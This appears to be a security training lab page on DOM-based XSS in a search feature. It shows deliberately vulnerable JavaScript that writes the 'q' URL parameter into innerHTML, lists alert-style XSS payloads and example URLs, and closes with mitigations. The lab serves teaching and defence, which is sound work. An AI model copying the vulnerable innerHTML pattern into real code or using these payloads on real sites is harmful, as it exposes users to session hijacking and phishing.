Lab 3: Search Results DOM XSS

Difficulty: Medium

Lab Overview

This lab demonstrates a DOM XSS vulnerability in a search functionality that displays search results and query parameters without proper sanitization. The search query is reflected in multiple places in the DOM.

Objective: Inject a DOM XSS payload through the search functionality that will execute when displaying search results.

Vulnerable JavaScript Code

// Vulnerable search functionality
function performSearch() {
    var query = document.getElementById('searchInput').value;
    var urlParams = new URLSearchParams(window.location.search);
    var searchQuery = urlParams.get('q') || query;
    
    // Vulnerable: Direct insertion into DOM
    document.getElementById('searchQuery').innerHTML = 
        'Search results for: <strong>' + searchQuery + '</strong>';
    
    // Vulnerable: Search results display
    document.getElementById('searchResults').innerHTML = 
        '<div class="result">' +
        '<h4>Result 1: ' + searchQuery + '</h4>' +
        '<p>This is a sample result for your query: ' + searchQuery + '</p>' +
        '</div>';
    
    // Vulnerable: URL display
    document.getElementById('currentUrl').innerHTML = 
        'Current URL: ' + window.location.href;
    
    // Vulnerable: Search suggestions
    var suggestions = document.getElementById('suggestions');
    suggestions.innerHTML = 
        '<h6>Related searches:</h6>' +
        '<ul>' +
        '<li><a href="?q=' + searchQuery + '1">' + searchQuery + '1</a></li>' +
        '<li><a href="?q=' + searchQuery + '2">' + searchQuery + '2</a></li>' +
        '</ul>';
}

// Initialize search on page load
window.addEventListener('load', function() {
    var urlParams = new URLSearchParams(window.location.search);
    var query = urlParams.get('q');
    if (query) {
        document.getElementById('searchInput').value = query;
        performSearch();
    }
});

Live Demo

Search Query:

Search Results:

Current URL:

Search Suggestions:

Test URLs:

Try these URLs in your browser:

?q=test - Normal search
?q=<script>alert('XSS')</script> - XSS payload
?q=<img src=x onerror=alert('XSS')> - Image XSS
?q=<svg onload=alert('XSS')> - SVG XSS

Vulnerability Details

Type: DOM XSS via Search Parameters
Severity: Medium-High
Source: URLSearchParams and form input
Sink: innerHTML (multiple locations)
Trigger: Search form submission or URL parameter
Issue: Search functionality without sanitization

Test Payloads

Use these in the search form or URL parameter:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>
<body onload=alert('XSS')>

Example URLs:

3.php?q=<script>alert('XSS')</script>
3.php?q=<img src=x onerror=alert('XSS')>

Real-World Attack Scenarios

Search functionality defacement and hijacking
Session hijacking through malicious search queries
Credential theft via fake search result pages
Malware distribution through search result links
Phishing attacks with legitimate-looking search results
SEO poisoning and search result manipulation

Mitigation Strategies

Use textContent instead of innerHTML
Implement proper input validation and sanitization
Use Content Security Policy (CSP) headers
Sanitize all search parameters before DOM insertion
Use safe DOM manipulation methods
Implement proper output encoding
Use a JavaScript security library like DOMPurify
Validate search queries against allowed patterns